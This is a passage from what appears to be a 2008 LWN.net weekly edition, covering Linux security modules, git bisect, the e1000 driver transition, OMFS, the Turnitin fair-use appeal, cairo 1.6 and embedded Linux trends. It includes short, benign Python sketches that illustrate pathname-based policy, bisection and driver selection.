large companies see the platform.  They are all seeing growth in Linux;
Bdale Garbee (representing HP) noted that Linux is "showing up in
everything" that customers are planning.  IBM's Dan Frye said that Linux is
ready for any kind of workload.  Oracle's Wim Coekaerts did note, though,
that Oracle's revenue from Linux, at a mere $2 billion, is "still
lagging."


There was a fair amount of discussion on how to work with the development
community; NetApp's Brian Pawlowski asserted that "money helps."  By that,
he means employing developers to work within the community and advance the
platform.  Bdale noted that HP tries to work "in" the community, not "with"
it.  Dan Frye echoed that thought, saying that it's important to have
people with credibility in the community and to allow them to work inside
the community for long periods of time.  Motorola's Christy Wyatt, instead,
worried that her company still doesn't have the necessary wisdom to work
effectively with the development community; Linux and the mobile industry,
she says, are still relatively new to each other.


Wim related a story from the first kernel summit
wherein an Oracle representative presented a laundry list of desired
features.  That is, he says, not the right way to do things; the community
tends not to react well to wishlists with no development effort behind
them.  Oracle now has a Linux development team which is entirely separate
from the normal product teams; among other things, it has a blanket
approval to contribute the code it develops, avoiding the lengthy and
tiresome internal legal review process.  The company has also adopted a
policy of making projects open from the beginning, getting much-needed
review early in the process.


Other participants noted that working with a company's legal department can
often be the hardest part of community participation.  Dan suggested
bringing in the legal department at the beginning of a project and
keeping them around; sticking with a single counsel who can slowly be
educated in free software ways is also important.  Bdale said that we were
likely to need "legal domain experts" for some time yet, but that the
situation is getting better; most lawyers now have at least some
understanding of how free software licensing works.  A couple of panelists
discussed the legal headaches that come with mixing components with
different licenses; they would certainly like to see fewer licenses going
into the future.


The final session from the first day covered the state of mobile Linux.  It
was about the only contentious panel on a day when most of the sessions
were educational in nature.  One area of disagreement was over
security models.  Some platforms (such as ACCESS)
work with a fine-grained 
set of privileges, while Google's Android uses sandboxing and controlled
access to resources determined by asking the user.  The fine-grained
approach is seen by some as an ideal way for carriers to lock down handsets
and exert firm control over what handset owners can do - not the desired
outcome.  On the other hand, 
asking users is seen as insecure; it's not usually too hard to get users to
agree to almost anything.


Perhaps the lowest moment in this panel came when Google's Eric Chu was
asked about participation with the community as opposed to developing
everything as a private fork.  He replied that the Android code was open; it sits
in a repository somewhere.  But there will be no effort to engage with (for
example) the kernel community and merge this code until it is "done."  That
approach runs against what others had been saying since the kernel panel that
morning: one must get code out there as early as possible.  When the
Android developers finally decide that their code is ready, they are likely
to have a nasty surprise when they try to merge it into the kernel and are
told that much of it is unsuitable by design.  Google came off looking
somewhat bad here, but the truth of the matter is that most of the (many)
mobile Linux projects are operating in similar ways.  Getting these
projects to really work with the communities whose code they are using is,
as with many embedded applications, a challenge.  One can hope that the
suggestions given to these projects at the summit will be taken to heart.


That sort of communication is what makes this event worthwhile; it is often
hard for this particular mixture of people to come together in other
contexts.  The Collaboration Summit was heavy on conversation in general,
often to great effect.  One well-known developer commented to your editor
that the Summit had the biggest disparity between the official content and
the "hallway track" that he had ever seen.  The hallway track was good,
with, hopefully, lots of good things to come from it in the coming months.

		TOMOYO Linux and pathname-based security


It takes a certain kind of courage to head down a road when one can plainly
see the unpleasant fate which befell those who went before.  So one might
think that the fate of AppArmor would deter others from following a similar
path.  The developers of TOMOYO
Linux are not easily put off, though.  Despite having a security
subsystem which shares a number of features with AppArmor, these developers
are pushing forward in an attempt to get their code into the mainline.

AppArmor, remember, is a Linux security module which uses pathnames to make
security decisions.  So it is entirely conceivable that two different
security policies could apply to the same file if that file is accessed by
way of two different names.  This approach helps make AppArmor easier to
administer than SELinux, but it has given AppArmor major
problems in the review process for a few reasons:


 There has been strong resistance to the addition of any new security 
     modules at all, to the point that proposals to remove the LSM
     framework altogether have been floated.

 Some security developers see a pathname-based mechanism as being
     fundamentally insecure.  SELinux developers, in particular, have been
     very strongly against pathname-based security.  To these developers,
     security policies should apply directly to objects (or to labels
     attached directly to objects) rather than to names given to objects.

 The current Linux security module hooks, not being developed with
     pathname-based security in mind, do not provide sufficient information to
     the low-level file operation hooks.  So AppArmor had to reconstruct
     pathnames within its security hooks.  The method chosen for this
     reconstruction was, one might say, not universally admired.


If the TOMOYO Linux developers are serious about getting their code into
the mainline, they will need to have answers to these objections.
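
The second objection is easier to see with a small experiment.  What
follows is a minimal user-space sketch, not AppArmor or TOMOYO Linux code:
the policy table, the file names, and both decision functions are invented
for illustration.  It creates a hard link so that one file has two names,
then compares a decision keyed on the name with one keyed on the object
itself (here approximated by the device and inode numbers).

```python
import os
import tempfile

# Hypothetical policy table, invented for this illustration only.
PATH_POLICY = {"secret.txt": "deny", "alias.txt": "allow"}


def path_decision(path):
    """Decide by the name used to reach the file (pathname-based)."""
    return PATH_POLICY.get(os.path.basename(path), "deny")


def object_decision(path, label_by_inode):
    """Decide by a label attached to the object itself (keyed on inode)."""
    st = os.stat(path)
    return label_by_inode.get((st.st_dev, st.st_ino), "deny")


def demo():
    with tempfile.TemporaryDirectory() as d:
        original = os.path.join(d, "secret.txt")
        alias = os.path.join(d, "alias.txt")
        with open(original, "w") as f:
            f.write("data")
        os.link(original, alias)  # a second name for the same file

        st = os.stat(original)
        labels = {(st.st_dev, st.st_ino): "deny"}
        return {
            "same_file": os.path.samefile(original, alias),
            "by_path": (path_decision(original), path_decision(alias)),
            "by_object": (object_decision(original, labels),
                          object_decision(alias, labels)),
        }


if __name__ == "__main__":
    print(demo())
```

The name-based check gives two different answers for what is, by any
other measure, a single file; the object-based check cannot be fooled that
way, at the cost of needing labels on every object.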

As it happens, the first two obstructions have mostly gone away.  Casey
Schaufler's persistence finally resulted in the merging of the SMACK
security module for 2.6.25; it is the only such module, other than SELinux,
ever to get into the mainline.  Now that SMACK has paved the way, talk of
removing the LSM framework (which had been strongly vetoed by Linus in any
case) has ended and the next security module should have an easier time of
it.

Linus has also decreed that pathname-based security modules are entirely
acceptable for inclusion into the kernel.  So, while some developers remain
highly skeptical of this approach, their skepticism cannot, on its own, be
used as a reason to keep a pathname-based security module out.
Pathname-based approaches appear to be "secure enough" for a number of
applications, and there are some advantages
to using that approach.

All of the above is moot, though, if the TOMOYO Linux developers are unable
to implement pathname-based access control in a way which passes muster.
The recent TOMOYO Linux patch
took a different approach to this problem: since the LSM hooks do not
provide the needed information, the developers just added a new set of
hooks, outside of LSM, for use by TOMOYO Linux.  And, while they were at
it, they added new hooks at all enforcement points.  This was not a popular
decision, to say the least.  The whole idea behind LSM was to have a single
set of hooks for all security modules; if every module now adds its own set
of hooks, that purpose will have been defeated and the kernel will turn
into a big mess of security hooks.  Duplicating the LSM framework is not
the way to get a security module into the mainline.

So, somehow, the TOMOYO Linux developers will need to implement
pathname-based security in a different way.  The most obvious thing to do
would be to modify the existing hooks to supply the requisite information
(being a pointer to the vfsmount structure).  The problem here is
that, at the point where the LSM hooks are called, that structure is not
available; it is only used at the higher levels of the virtual filesystem
code.  So either some core VFS functions would have to be changed (so the
vfsmount pointer could be passed into them), or a new set of hooks
would need to be placed at a level where that pointer is available.  It
appears that the second approach - adding new hooks in the namespace code -
will be taken for the next version of the patch.


As the TOMOYO Linux developers work through this problem, they are likely
to be closely watched by the (somewhat reduced in number) AppArmor group.
There appears to be a resurgence of interest in getting AppArmor merged, so
we will probably see AppArmor put forward again in the near future.  That
will be even more likely if TOMOYO Linux is able to solve the pathname
problem in a way which survives review and gets into the kernel.

		Bisection divides users and developers


The last couple of years have seen a renewed push within the kernel
community to avoid regressions.  When a patch is found to have broken
something that used to work, a fix must be merged or the offending patch
will be removed from the kernel.  It's a straightforward and logical idea,
but there's one little problem: when a kernel series includes over 12,000
changesets (as 2.6.25 does), how does one find the patch which caused the
problem?  Sometimes it will be obvious, but, for other problems, there are
literally thousands of patches which could be the source of the
regression.  Digging through all of those patches in search of a bug can be
a needle-in-the-haystack sort of proposition.


One of the many nice tools offered by the git source code management system
is called "bisect."  The bisect feature helps the user perform a binary
search through a range of patches until the one containing the bug is
found.  All that is needed is to specify the most recent kernel which is
known to work (2.6.24, say), and the oldest kernel which is broken
(2.6.25-rc9, perhaps), and the bisect feature will check out a version of
the kernel at the midpoint between those two.  Finding that midpoint is
non-trivial, since, in git, the stream of patches is not a simple line.
But that's the sort of task we keep computers around for.  Once the
midpoint kernel has been generated, the person
chasing the bug can build and 
test it, then tell git whether it exhibits the bug or not.  A
kernel at the new midpoint will be produced, and the process continues.
With bisect, the problematic patch can be found in a maximum of a dozen or
so compile-boot-test cycles.
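
The arithmetic behind that claim can be sketched in a few lines.  The
function below is a simplified model, not what git does: it assumes a
strictly linear history and a bug which, once introduced, stays present in
every later commit.  The function name and the is_bad() callback (standing
in for one compile-boot-test cycle) are hypothetical.

```python
import math


def bisect_first_bad(n_commits, is_bad):
    """Return (index of first bad commit, number of tests run).

    Commit 0 is known good and commit n_commits is known bad; the
    commits in between are numbered 1..n_commits-1.  is_bad(i) stands
    in for one compile-boot-test cycle on commit i.
    """
    good, bad = 0, n_commits
    tests = 0
    while bad - good > 1:
        mid = (good + bad) // 2   # trivial midpoint on a linear history
        tests += 1
        if is_bad(mid):
            bad = mid
        else:
            good = mid
    return bad, tests


if __name__ == "__main__":
    # Pretend commit 7777 out of 12,000 introduced the regression.
    first, tests = bisect_first_bad(12000, lambda i: i >= 7777)
    print(first, tests, math.ceil(math.log2(12000)))
```

Since each test halves the remaining range, a 12,000-commit series needs
no more than ceil(log2(12000)) = 14 cycles in this model, which is in line
with the "dozen or so" figure.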


Bisect is not a perfect tool.  If patch submitters are not careful, bisect
can create a broken kernel when it splits a patch series.  The patch which
causes a bug to manifest itself may not be the one which introduced the
bug.  In the worst case, a developer may merge a long series of patches,
finishing with one brief change which enables all the code added
previously; in this case, bisect will find the final patch, which will only
be marginally useful.  If the person reporting the bug is running a
distributor's kernel, it may be hard to get that kernel in a form which is
amenable to the bisection process.  Bisection might require
unacceptable downtime on the only (production) system which is affected by
the bug.  And, of course, the process of checking out, building, booting,
and testing a dozen kernels is not something which one fits into a coffee
break.  It requires a certain determination on the part of the tester and
quite a bit of time.


All of the points above would suggest that requesting a bisection from a
user reporting a bug should be done as a last resort.  In that context, it
is worth looking at the story of a recent bug report which suggests that
some observers, at least, think that kernel developers are relying a little
too heavily on this tool.  On April 9, Mark Lord reported a regression in
the networking stack; after making a couple of guesses, the network
developers suggested that the problem be bisected.


Mark replied that he did not have the time to go through a full
bisection, and that he would much rather be provided a list of commits
which might be at fault.  That list was not forthcoming, though; there were
no developers who had an idea of where the problem might be and, as it
turns out, the developer who introduced the bug lives in a time zone which
caused him to miss the discussion.  Mark's response was strong:


	Years ago, Linus suggested that he opposed an in-kernel debugger
	mainly because he preferred that we *think* more about the
	problems, rather than just finding/fixing symptoms.  This 100%
	reliance upon git-bisect is worse than that.  It has people now
	just tossing regressions into the code left and right, knowing that
	they can toss all of the testing back at the poor folks whose
	systems end up not working.


Andrew Morton also worries that developers
resort too quickly to a bisection request rather than working with users as
was once done.  Either that, he says, or developers just ignore the report
from the beginning.


Other developers have answers to these worries, of course.  Kernel
developers often are not in a position to reproduce a reported bug; it may
depend on the specifics of the user's hardware or workload.  So they must
depend on the user to try things and inform them when a change fixes the
problem.  Here's David Miller's view on how
things used to work:


	In fact, this is what Andrew's so-called "back and forth with the
	bug reporter" used to mainly consist of.  Asking the user to try
	this patch or that patch, which most of the time were reverts of
	suspect changes.  Which, surprise surprise, means we were spending
	lots of time bisecting things by hand.
	
	We're able to automate this now and it's not a bad thing.


The other answer that one hears is that the situation now is much
different, with far more users, much more code, and more problems to deal
with.  The old "back and forth" mode was better suited to smaller user
and developer communities; in the current world, things must be done
differently.  David Miller again:


	What people don't get is that this is a situation where the "end
	node principle" applies.  When you have limited resources (here:
	developers) you don't push the bulk of the burden upon them.
	Instead you push things out to the resource you have a lot of, the
	end nodes (here: users), so that the situation actually scales.


There is another aspect of the problem which is spoken about a bit less
frequently: developers must prioritize bug reports and decide which ones to
work on.  Unlike some projects, the kernel does not have anybody serving in
any sort of bug triage role, so, in the absence of a disgruntled and paying
customer, most developers make their own decisions on which problems to try
to solve.  It should not be surprising that problems with the most complete
information are the ones which are most likely to be addressed first.  

A bug report with a bisection that fingers a specific commit is a report
with very good information, one which is generally easy to resolve.  As an
example, consider Mark Lord's report again; he did eventually take the time
(five hours, apparently) 
to bisect the problem and report the
results; the bug was found and fixed almost immediately thereafter -
despite the fact that the responsible developer was still sleeping
on the other side of the planet.


Even less spoken about is the fact that quite a few problems are one-off
occurrences.  Somewhere out there in the world, there is a single user who,
due to a highly uncommon mixture of hardware and software, experiences a
problem which affects (almost) nobody else.  Marginal hardware, out-of-tree
patches, and overclocking only make the problem worse.  Arjan van de Ven's
kernel oops summaries are illustrative in this regard; the
statistics for the 2.6.25-rc kernels show that a half-dozen problems
account for over half of the reports, while the vast majority of oopses
have only a single occurrence.

Kernel developers have learned that this kind of problem report tends to go
away by itself; the affected user finds a way around the issue (or just
gives up) and nobody else ever complains.  One can well argue that trying
to chase down this kind of problem is not a good use of a kernel
developer's time.  The hard part is figuring out which reports are of this
variety.  One relatively straightforward way is to wait until reports from
other users confirm the problem - or until a sufficiently determined user
bisects the problem and provides a commit ID.  In this sense, bisection
serves as a sort of triage mechanism which requires users to perform enough
work to show that the problem is real.


So the developers do have very good reasons for requesting bisections from
users.  That said, there is reason to worry that many users will simply
stop sending in bug reports.  If the only response they can expect is a
bisection request (which they may be in no position to answer), they may
see no point in reporting bugs at all.  Fewer bug reports is not the path
toward more solid kernel releases.  So, as useful as it is, bisection will
have to be a tool of last resort in most cases.  The good news is that the
development community does seem to understand that; bisection remains just
one of the many tools we have for the isolation and solution of problems.

The not-quite-so-good news is that, as Al
Viro and James Morris have pointed out,
the real problem is in the review of code so that fewer bugs are created in
the first place.  That is not a problem which can be solved with
bisection.

		e1000 v. e1000e


Ingo Molnar was recently bitten by a problem which, in one form or
another, may affect a wider range of Linux users after 2.6.26.  Linux
currently has two drivers for Intel's e1000 network adapters, called
"e1000" and "e1000e".  The former driver, being the older of the two,
supports all older, PCI-based e1000 adapters.  There is, shall we say, a
relative shortage of developers who are willing to stand up for the quality
of the code in this driver, but it works and has a lot of users.

The e1000e driver, instead, supports PCI-Express adapters.  It
is a newer driver which is seen as being better written and easier to
maintain.  It is intended that all new hardware will be supported by this
driver, and that, in particular, all PCI-Express hardware will use it.  The
only problem is that a few PCI-Express chipsets were added to the older
e1000 driver before this policy was adopted.  Since the newer driver also
supports those chipsets, there are two drivers (with two completely
different bodies of code) supporting the same hardware.  The e1000
maintainers would like to end this duplication and put the e1000 driver
into a stable maintenance mode.

To that end, earlier this month, it was announced that, 
as of 2.6.26, the PCI IDs corresponding to PCI-Express devices would be
removed from the e1000 driver, and that all users of that affected hardware
need to move over to e1000e.  The e1000 developers had originally tried
to make this move for 2.6.25, but they committed a fundamental faux
pas in the process: they broke Linus's machine.  So that change got
reverted before 2.6.25-rc1 came out.  Instead, now, we have the
announcement that the change is coming in the next cycle (when the e1000e
problems, presumably, will be fixed) and a bit of configuration trickery
has been added; it causes the e1000 driver to not claim PCI-Express
devices if the e1000e driver has been built into the kernel.

Ingo's problem is that he built the e1000 driver into his kernel, but
ended up with e1000e configured as a module which was never loaded.  That combination leads
to a network adapter which does not work at all, since the built-in driver
no longer claims it.  Ingo, a bit disgruntled at having to spend an hour
tracking down the problem, has suggested that it is a regression which must
be fixed.  The e1000 driver maintainers have resisted doing so, but Linus,
having also been burned, agrees.  So, while
this transition is likely to go ahead as scheduled, 2.6.25 will probably
have a configuration change designed to keep others from falling into a
similar trap.
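
The trap can be modeled in a few lines.  This is only a sketch of the
behavior as described above, not the actual Kconfig or driver logic: the
function and its arguments are hypothetical, module loading for e1000
itself is ignored, and the assumption (inferred from Ingo's case) is that
e1000 gives up the PCI-Express IDs whenever e1000e is configured at all,
even as a module.

```python
def claiming_driver(e1000, e1000e, e1000e_loaded=False):
    """Return the driver that claims a PCI-Express e1000 adapter, or None.

    e1000 and e1000e are each "y" (built in), "m" (module) or "n" (off).
    """
    # e1000e claims the device when built in, or when its module is loaded.
    if e1000e == "y" or (e1000e == "m" and e1000e_loaded):
        return "e1000e"
    # Assumed trickery: e1000 keeps the PCI-Express IDs only when e1000e
    # has not been configured at all.
    if e1000 != "n" and e1000e == "n":
        return "e1000"
    return None


if __name__ == "__main__":
    # Ingo's configuration: e1000 built in, e1000e a module never loaded.
    print(claiming_driver("y", "m"))
```

In Ingo's configuration the function returns None: neither driver claims
the adapter, which matches the dead network interface he ran into.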

		OMFS and the value of obscure filesystems


Your editor has never dabbled in filesystems development.  He has a
suspicion, however, that there is a tense moment in every new filesystem
developer's life: when Christoph Hellwig's review shows up in the mailbox.
Christoph's reviews, while not always being pleasant reading, tend to be
right on the money with regard to problems in filesystem implementations -
and problems in new filesystems are common.  Christoph's stamp of approval
is almost required for the merging of a filesystem, so, when the initial
posting of a filesystem is greeted with reviews that read, nearly in their
entirety, "looks good," one would assume that the path into the mainline
would be straightforward.


The story of OMFS, though,
shows that this assumption does not always hold.  Reviewers have only been able to find
the smallest of details to fix, but there is opposition to its merging,
especially from Andrew Morton.  The objection is that this filesystem -
found on devices like the Rio Karma music player and ReplayTV boxes - has a
very small user base.  OMFS developer Bob Copeland, in his initial posting,
suggested that fewer than twenty people might be using it at this time.
New devices with this filesystem are no longer being made, so the chances
of the user base growing significantly are small.

Andrew's objection is that the addition of any new code creates a new
maintenance burden for kernel developers.  Whenever a VFS interface is
changed, all filesystems must be fixed to work with the new API.  So the
addition of a filesystem imposes costs which, he says, should be outweighed
by the benefits that new filesystem brings.  In the case of an obscure
filesystem with a small and (presumably) decreasing user base, says Andrew, it is not
clear that the benefits are sufficient.  He asks:


	Just as a thought exercise: should we merge a small and well-written
	driver which has zero users?


Andrew would rather see OMFS turned into a user-space filesystem using
FUSE.  Chris Mason is also concerned:


	Even though OMFS seems to be using the generic interfaces well,
	there is still a testing burden for every change.  Someone needs to
	try it, report any problems and get them fixed.  Since none of the
	people making the changes is likely to have an OMFS test bed, all
	of that burden will fall on Bob, his users, and anyone who tries to
	compile the module (Andrew).


OMFS supporters note that the code is written well and can serve as an
example for other filesystem authors.  They also note that code with small
user bases is often merged - that, in fact, in some areas, developers have
said they want all code, regardless of how few people are using it.
Running OMFS through FUSE, they say, would be harder for users to set up
and less efficient in operation.  Says
Christoph:


	Moving a simple block based filesystem means it's more complicated,
	less efficient because of the additional context switches and
	harder to use because you need additional userspace packages and
	need to setup fuse.
	
	We made writing block based filesystems trivial in the kernel to
	grow more support for filesystems like this one.


It looks like Andrew will back down on this one and let the
next version of the OMFS patches into -mm.  From there, if all goes well,
it could make the jump into the mainline, possibly as early as 2.6.27.  But
Andrew is clearly unhappy about that outcome, and may well raise the
question again in the future: is "well written" really sufficient to
justify merging new filesystems into the kernel?

		Turnitin and fair use


The McLean, Va.  High School students whose copyright infringement lawsuit
against iParadigms, LLC and its Turnitin
plagiarism-detection software system was dismissed
on summary judgment on March 11 have filed a notice of appeal [PDF] to the
Fourth Circuit Court of Appeals.

That was likely a surprise to iParadigms, whose CEO John Barrie confidently
predicted that hell would freeze over before the students would
appeal. Yet, appeal they have. So this story isn't over yet.  
In his Opinion [PDF], District Court Judge Claude Hilton ruled that
Turnitin's use was highly transformative and hence fair use; that
is one of the issues that will be appealed, as Robert Vanderhye, the
attorney representing the students pro bono, explained to me in an email
interview: 

What the
judge held, and what we are appealing, are (1) if a minor clicks on to
the Turnitin.com website he/she is bound by the conditions of the
"Agreement" even if it denies the student the ability to enforce his/her
copyright, and (2) as a matter of law the Turnitin use is transformative
so that it is fair use instead of copyright infringement.


With respect to the first, we submit that the Court misinterpreted
Virginia law, and did not apply the controlling Virginia cases that we
cited.


With respect to the second there clearly are facts in dispute.  Among
the facts in dispute are a) does the Turnitin system work to deter
plagiarism, or does it actually encourage plagiarism since it is so
easily avoided by anyone who really wants to plagiarize; b) is the
Turnitin system so insecure that students papers can easily be recovered
by a hacker so as to easily allow theft of the students' works, or for a
criminal to use information contained in student works against them; and
c) how can the Turnitin use be transformative when they will send a
student's work verbatim to someone outside the student's school system
without the student's permission, or even knowledge.   Also, with
respect to the second point, Turnitin violates the FERPA since student
names, schools, and personal information are usually on the student
works; since it violates FERPA as a matter of law the Turnitin system is
against the public interest, and therefore there can be no fair use.


He mentions that there are facts in dispute because a court is  only
supposed to grant summary judgment if the pleadings and supporting
documents, when viewed in the light most favorable to the non-moving party,
show that there is no genuine issue as to any material
fact. Fed. R. Civ. P. 56(c).


The major issues being appealed, then, are:  Was it error to dismiss this
lawsuit on summary judgment?  Can minors lose copyright rights by
clicking "I agree" to an agreement that their schools compelled them to
agree to?  What about the privacy issues under the Family
Educational Rights and Privacy Act (FERPA)?  But the key question is,
Is this fair use?


iParadigms' point of view, one that the lower court agreed with, is that a
lot of high schools
and universities use this software and rely on it. They find plagiarism
goes down significantly.    Turnitin isn't using the creative parts of the
papers for commercial gain, the judge said;  it's  a system of integrity
checking. And that's a transformative use.  


Similarities between Google Books and Turnitin:

The computer does the copying, not humans.    
Both archive complete copies of the works.  
Neither gets the works directly from the copyright holder. 
Both claim the use is transformative. 


Differences:

The students are  minors.
There are arguably privacy issues with Turnitin.  
The student papers are unpublished works.
The conceivable market harm is distinguishable. 
There is no way students can opt out.  Any author can opt out of Google
Books.
Turnitin represents itself as a system for protecting copyrights.


For that matter, so  is Google
Books, in that it's a kind of digital card catalogue, letting us know where
to find books with information we want. In Perfect 10,
Inc. v. Google, Inc. (the thumbnail photo case, hence another
works-in-a-computer-database fact pattern) the court found that, too, was
transformative and hence fair use.  Judge Hilton notes this finding in his
order on page 13.  The photos had one purpose originally, the court
found, but putting 
them into a database was something not originally intended, and the search
engine "provides a social benefit by incorporating an original work into a
new work, namely, an electronic reference tool."  The purpose is limited
and the works are used only for comparative purposes that provide a social
benefit. He does mention the exception to that, however, in that if there
is a request to see the work a student's paper allegedly seems to have
plagiarized, a teacher can obtain that work to evaluate. Hence the appeal
over archiving by students who don't want their works used that way. If
the students have issues about having to use the system, they should take
it up with the schools, the judge ruled, because that is who is giving
Turnitin authority to do what they are doing with these student papers, and
he thought
the schools had the right. As for fair use, Judge Hilton found that this
was a transformative use, and he
quoted a definition of transformative from a case, Harper &
Row Publishers, Inc. v. Nation Enterprises, to mean that it "adds
something new, with
a further purpose or different character".  If use is transformative, he
wrote,
it's "strong evidence" that the use is fair use.
iParadigms has on its website a legal opinion [PDF] it commissioned from
Foley & Lardner.
Fair use is a bit hard to pin down. Even the legal opinion notes that fair
use is very much dependent on the facts of each
situation:

Determining whether a copyright exists in a particular work or is infringed
by a particular use of the work is difficult.  The analysis is so
fact-specific that relatively minor variations between the  facts of
superficially similar cases often lead to diametrically different
conclusions.


To grasp  the students' point of view,  imagine if a company  decided to
offer a service to check for infringed code, so it collected all  the
world's proprietary software it could get its hands on, without permission
from the original authors.  Say it got copies from the world's libraries.
And there was no way to opt out. 

Now, imagine that if  the software thought it found a match, you could
request to see the proprietary code that it was thought to infringe.  Do
you think the proprietary software companies or the authors of that code
would view that as a transformative fair use?   
The crux of the students' issue, then, is the archiving.  They don't want
their papers to remain in the system, even if they must submit them for
originality review. It bothers them that iParadigms archives the students'
manuscripts and then uses them for profit, while they, the students, lose
control over their own work without getting any compensation.  The students
have their own website, Don'tTurnItIn.com, and they have some
additional court filings available there.

A lot of commentary so far has cited
Judge Hilton's ruling, because of its fair use arguments, viewing the
opinion as perhaps being helpful to Google in the litigation brought
against it by the Authors Guild and others regarding Google
Books, and I'm sure you can see why.  But there are significant
differences too.


Some  have argued that copyright law is out of date  in a digital world,
the Internet being nothing but one huge copying machine. Computers copy,
and so some suggest it would be more logical and less damaging to penalize
wrongful distribution, not copying.  In that sense, the judge's ruling was
quite progressive.   Indeed, it's hard to read his opinion without
concluding that to Judge Hilton, copying by a computer isn't a problem, so
long as human eyes are not involved,  the use is transformative, and there
is no distribution for profit or any market harm.  


In iParadigms' Counterclaims
[PDF], there were several other causes of action, trying to mold the facts
into a claim of "trespass to chattels" and even claims of violations of
the Computer Fraud and Abuse Act, as well as Virginia's Computer Crimes
Act. Those are serious allegations.  On the first, the assertion was that
the plaintiffs used nyms like 'Rube Goldberg' and
'Perpetual Motion' to improperly file papers in the Turnitin system without
authorization.
The court dismissed those counterclaims, pointing out that you have to
prove actual damages and, in the case of trespass to chattels, some
impairment of quality or condition or use.   It's a bit hard to come up
with a dollar figure for how harmed one is by someone's use of a nym. As
for filing the papers without authority, where's the financial harm, the
court asked?   
Trespass to chattels in
meat space is like someone taking your car for a joy ride,  getting into a
fender bender, and then bringing the car back without  fixing the fender or
even filling the gas tank back up.  Not only is the car damaged, but you
didn't have use of it while it was out being driven around, and so you
couldn't drive it to the airport yourself as  you intended and missed your
job interview.  And it's your car, your personal property, which is what chattel
means. 

Like many other legal concepts, it has been applied to the digital world, as if
physical property and intellectual property are identical, and in some
ways, it fits.  AOL was an early trailblazer in using trespass to chattels
successfully  against spammers, arguing that the
sheer volume of emails interfered with their being able to use their own
system as intended to service their real customers properly (here's one
example).  

iParadigms also claimed that the terms of their Usage Policy provided
for indemnification to iParadigms arising out of any use of the Turnitin
website. It also has a user agreement that you are confronted with and must
click "I Agree" to in order to submit papers to Turnitin. The judge made a
distinction between the user agreement and the Usage Policy, however,
noting that there was no "I Agree" to the Usage Policy or any evidence that
the students saw it, and it was  not referenced or incorporated into   the
user agreement.  So he decided that while the students were bound by what
they said "I Agree" to, they never agreed to the Usage Policy. But the
appeal asks whether these minors  ever gave a legally binding assent, since
their "I Agree" was really "My School Says I Have to Agree".  In some
respects, this EULA issue may be as interesting to track as the fair use
questions.

		The Cairo Project reaches a new milestone


The cairo project is producing
a cross-platform universal vector graphics library:


Cairo is a 2D graphics library with support for multiple output devices. Currently supported output targets include the X Window System, Win32, image buffers, PostScript, PDF, and SVG file output. Experimental backends include OpenGL (through glitz), Quartz, and XCB.
Cairo is designed to produce consistent output on all output media while taking advantage of display hardware acceleration when available (eg. through the X Render Extension).


Cairo is used by the GNOME desktop environment and some
KDE applications.
The Wikipedia
article
on cairo has more background information on the project.
LWN investigated
cairo back in August, 2005 at the time of the 0.9.0 release.
Progress on cairo has been steady since then, with releases coming out
frequently.


Major version 1.6.0 of cairo was recently
announced:


This is a major update to cairo, with new
features and enhanced functionality which maintains compatibility for
applications written using cairo 1.4, 1.2, or 1.0. We recommend that
anybody using a previous version of cairo upgrade to cairo 1.6.0.


A list of the major changes in cairo 1.6.X includes:


 PDF generation has been greatly improved, and the number of rasterized image fallbacks has been greatly reduced.
 The PostScript and PDF output code have had a number of efficiency and portability improvements.
 The pixman library has been split out so that it can be shared by cairo and the X server.
 Cairo 1.6.X now supports arbitrary X TrueColor and 8-bit PseudoColor visuals.
 The Mac OS X Quartz backend is now an official part of cairo and the API has been stabilized.
 A new win32 printing backend has been added.
 There have been a number of minor API additions to cairo.
 Numerous "robustness fixes" have been added.
 Other enhancements and bug fixes have been added.


As is typical with major releases, several bug fix releases quickly
followed.  The first was
version 1.6.2
which addressed a problem with certain PostScript printers.
That was followed by
version 1.6.4:
"The cairo community is wildly embarrassed to announce the 1.6.4
release of the cairo graphics library. This release reverts the xlib
locking change introduced in 1.6.[2], (and the application crashes that
it caused)."  Hopefully the code will now stabilize and be
adopted by the upstream applications.


Congratulations go out to Carl Worth and the other cairo developers
for this major release and their continued work on this important project.


		ELC: Trends in embedded Linux


Henry Kingman, editor of LinuxDevices, opened the  
Embedded Linux Conference 
with a look at the trends in embedded development since he started covering
the subject in 1999.  Based largely on the annual surveys run by LinuxDevices,
his keynote speech highlighted the growth of Linux as an embedded operating
system as well as where it is headed in the next few years. 


The conference, which started April 15 in Mountain View,
California, gathers around 175 embedded developers for three days of talks
on a wide variety of embedded topics.  Sponsored by the 
Consumer Electronics Linux Forum 
(CELF), the conference has become the premier technical conference for the
ever-growing embedded Linux community.  Each day has a keynote, with
kernel hacker Andrew Morton and CELF architecture group chair (and 
conference organizer) Tim Bird rounding those out, followed by a half-dozen
presentation slots, each with three parallel presentations.


Bird introduced Kingman as one of the main providers of news about embedded
Linux, relating that LinuxDevices and LWN.net are his "two main sources of
information" about the community.  Bird marveled at the body of work that
Kingman has amassed: "this guy is prolific".  He also reminisced a bit about
the early days of embedded Linux, from his days at Lineo to his 
current work at Sony:

It was hard to get people to pay attention to Linux, now Sony is putting
Linux into almost everything.


Kingman acknowledged Bird's introduction, but said that he didn't know
"if that makes me an expert in the forest, or lost in the trees".
He looked back to a 1999 San Francisco Bay Linux Users Group meeting
with Linus Torvalds as the featured speaker.  Kingman said that Torvalds
wanted Linux to be a desktop operating system but that he saw the embedded
space as the big growth area.  


Later that year, Kingman attended the first
LinuxWorld conference where he saw some folks from Transmeta talking about
squashfs and cramfs.  An article he wrote about those filesystems was
published by Rick Lehrbaum, founder
of LinuxDevices.  That was the first of more than 3000 articles
Kingman has since written for LinuxDevices.


Kingman then presented the results of the most recent 
LinuxDevices
reader survey.  The survey gathers information about what LinuxDevices 
readers are doing or planning with regard to embedded Linux development.  It
has been run for eight years, providing some interesting information on changes
in the readers' attitudes over the years.


Usage of Linux in embedded development projects crossed a threshold this year,
with more than 50% of the 812 respondents saying that they are currently
using it.  Usage of Linux has been 
growing year over year, but didn't cross the halfway mark until 2008.  More
than 61% believed their company would be using Linux within the next two years.


The ARM family of processors has continued its growth with 30% of the readers
using it, while 25% are using x86 variants.  ARM overtook x86 three years ago;
that trend looks to be continuing with respondents seeing 31% ARM versus 
23% x86 over the next two years.  Kingman said that he thinks Intel is
trying to reverse that trend because spending on consumer devices is predicted
to "outstrip IT spending".

 There were a couple of questions asking where respondents obtain the
version of Linux they use in their products.  Ubuntu has a somewhat
surprising share at 8%.  For a relatively new distribution that is not
specifically targeted at that market, it stands out, as does its predicted
growth to 10% over the next two years.  Kernel.org at 16% and Debian at 14%
are the leading sources; uClinux is tied with Ubuntu at 8%, while MontaVista
and Fedora come in at 6% each.


